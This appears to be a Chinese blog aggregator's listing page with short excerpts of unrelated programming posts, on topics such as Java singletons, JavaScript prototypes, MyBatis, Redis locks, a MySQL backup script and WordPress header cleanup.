谈到单例模式，我们立马会想到饿汉式和懒汉式加载，所谓饿汉式就是在创建类时就创建好了实例，懒汉式在获取实例时才去创建实例，即延迟加载。饿汉式： package com.bijian.study; public class Singleton { private Singleton() { } // 注意这是private 只供内部调用 private static
javascript读取和修改原型特别需要注意原型的读写不具有对等性 bijian1013 JavaScript prototype
对于从原型对象继承而来的成员，其读和写具有内在的不对等性。比如有一个对象A，假设它的原型对象是B，B的原型对象是null。如果我们需要读取A对象的name属性值，那么JS会优先在A中查找，如果找到了name属性那么就返回；如果A中没有name属性，那么就到原型B中查找name，如果找到了就返回；如果原型B中也没有
【持久化框架MyBatis3六】MyBatis3集成第三方DataSource bit1129 dataSource
MyBatis内置了数据源的支持，如： <environments default="development"> <environment id="development"> <transactionManager type="JDBC" /> <data
我程序中用到的urldecode和base64decode,MD5 bitcarter c MD5 base64decode urldecode
这里是base64decode和urldecode，Md5在附件中。因为我是在后台所以需要解码： string Base64Decode(const char* Data,int DataByte,int& OutByte) { //解码表 const char DecodeTable[] = { 0, 0, 0, 0, 0, 0
腾讯资深运维专家周小军：QQ与微信架构的惊天秘密 ronin47
社交领域一直是互联网创业的大热门，从PC到移动端，从OICQ、MSN到QQ。到了移动互联网时代，社交领域应用开始彻底爆发，直奔黄金期。腾讯在过去几年里，社交平台更是火到爆，QQ和微信坐拥几亿的粉丝，QQ空间和朋友圈各种刷屏，写心得，晒照片，秀视频，那么谁来为企鹅保驾护航呢？支撑QQ和微信海量数据背后的架构又有哪些惊天内幕呢？本期大讲堂的内容来自今年2月份ChinaUnix对腾讯社交网络运营服务中心
java-69-旋转数组的最小元素。把一个数组最开始的若干个元素搬到数组的末尾，我们称之为数组的旋转。输入一个排好序的数组的一个旋转，输出旋转数组的最小元素 bylijinnan java
public class MinOfShiftedArray { /** * Q69 旋转数组的最小元素 * 把一个数组最开始的若干个元素搬到数组的末尾，我们称之为数组的旋转。输入一个排好序的数组的一个旋转，输出旋转数组的最小元素。 * 例如数组{3, 4, 5, 1, 2}为{1, 2, 3, 4, 5}的一个旋转，该数组的最小值为1。 */ publ
看博客，应该是有方向的 Cb123456 反省看博客
看博客，应该是有方向的: 我现在就复习以前的，在补补以前不会的，现在还不会的，同时完善完善项目，也看看别人的博客. 我刚突然想到的: 1.应该看计算机组成原理，数据结构，一些算法，还有关于android,java的。 2.对于我，也快大四了，看一些职业规划的，以及一些学习的经验，看看别人的工作总结的. 为什么要写
[开源与商业]做开源项目的人生活上一定要朴素,尽量减少对官方和商业体系的依赖 comsci 开源项目
为什么这样说呢？因为科学和技术的发展有时候需要一个平缓和长期的积累过程，但是行政和商业体系本身充满各种不稳定性和不确定性，如果你希望长期从事某个科研项目，但是却又必须依赖于某种行政和商业体系，那其中的过程必定充满各种风险。。。所以，为避免这种不确定性风险，我
一个 sql优化（[精华] 一个查询优化的分析调整全过程！很值得一看） cwqcwqmax9 sql
见 http://www.itpub.net/forum.php?mod=viewthread&tid=239011 Web翻页优化实例提交时间: 2004-6-18 15:37:49 回复发消息环境： Linux ve
Hibernat and Ibatis dashuaifu Hibernate ibatis
Hibernate VS iBATIS 简介 Hibernate 是当前最流行的O/R mapping框架，当前版本是3.05。它出身于sf.net，现在已经成为Jboss的一部分了 iBATIS 是另外一种优秀的O/R mapping框架，当前版本是2.0。目前属于apache的一个子项目了。相对Hibernate“O/R”而言，iBATIS 是一种“Sql Mappi
备份MYSQL脚本 dcj3sjt126com mysql
#!/bin/sh # this shell to backup mysql #[email protected] (QQ:1413161683 DuChengJiu) _dbDir=/var/lib/mysql/ _today=`date +%w` _bakDir=/usr/backup/$_today [ ! -d $_bakDir ] && mkdir -p
iOS第三方开源库的吐槽和备忘 dcj3sjt126com ios
转自 ibireme的博客做iOS开发总会接触到一些第三方库，这里整理一下，做一些吐槽。目前比较活跃的社区仍旧是Github，除此以外也有一些不错的库散落在Google Code、SourceForge等地方。由于Github社区太过主流，这里主要介绍一下Github里面流行的iOS库。首先整理了一份 Github上排名靠
html wlwmanifest.xml eoems html xml
所谓优化wp_head()就是把从wp_head中移除不需要元素，同时也可以加快速度。步骤：加入到function.php remove_action('wp_head', 'wp_generator'); //wp-generator移除wordpress的版本号，本身blog的版本号没什么意义，但是如果让恶意玩家看到，可能会用官网公布的漏洞攻击blog remov
浅谈Java定时器发展 hacksin java 并发 timer 定时器
java在jdk1.3中推出了定时器类Timer,而后在jdk1.5后由Dou Lea从新开发出了支持多线程的ScheduleThreadPoolExecutor，从后者的表现来看，可以考虑完全替代Timer了。 Timer与ScheduleThreadPoolExecutor对比： 1. Timer始于jdk1.3,其原理是利用一个TimerTask数组当作队列
移动端页面侧边导航滑入效果 ini jquery Web html5 css javascirpt
效果体验：http://hovertree.com/texiao/mobile/2.htm可以使用移动设备浏览器查看效果。效果使用到jquery-2.1.4.min.js，该版本的jQuery库是用于支持HTML5的浏览器上，不再兼容IE8以前的浏览器，现在移动端浏览器一般都支持HTML5，所以使用该jQuery没问题。HTML文件代码： <!DOCTYPE html> <h
AspectJ+Javasist记录日志 kane_xie aspectj javasist
在项目中碰到这样一个需求，对一个服务类的每一个方法，在方法开始和结束的时候分别记录一条日志，内容包括方法名，参数名+参数值以及方法执行的时间。 @Override public String get(String key) { // long start = System.currentTimeMillis(); // System.out.println("Be
redis学习笔记 MJC410621 redis NoSQL
1)nosql数据库主要由以下特点：非关系型的、分布式的、开源的、水平可扩展的。 1，处理超大量的数据 2，运行在便宜的PC服务器集群上， 3，击碎了性能瓶颈。 1)对数据高并发读写。 2)对海量数据的高效率存储和访问。 3)对数据的高扩展性和高可用性。 redis支持的类型： Sring 类型 set name lijie get name lijie set na
使用redis实现分布式锁 qifeifei
在多节点的系统中，如何实现分布式锁机制，其中用redis来实现是很好的方法之一，我们先来看一下jedis包中，有个类名BinaryJedis,它有个方法如下： public Long setnx(final byte[] key, final byte[] value) { checkIsInMulti(); client.setnx(key, value); ret
BI并非万能，中层业务管理报表要另辟蹊径张老师的菜大数据 BI 商业智能信息化
BI是商业智能的缩写，是可以帮助企业做出明智的业务经营决策的工具，其数据来源于各个业务系统，如ERP、CRM、SCM、进销存、HER、OA等。 BI系统不同于传统的管理信息系统，他号称是一个整体应用的解决方案，是融入管理思想的强大系统：有着系统整体的设计思想，支持对所有
安装rvm后出现rvm not a function 或者ruby -v后提示没安装ruby的问题 wudixiaotie function
1.在~/.bashrc最后加入 [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" 2.重新启动terminal输入： rvm use ruby-2.2.1 --default 把当前安装的ruby版本设为默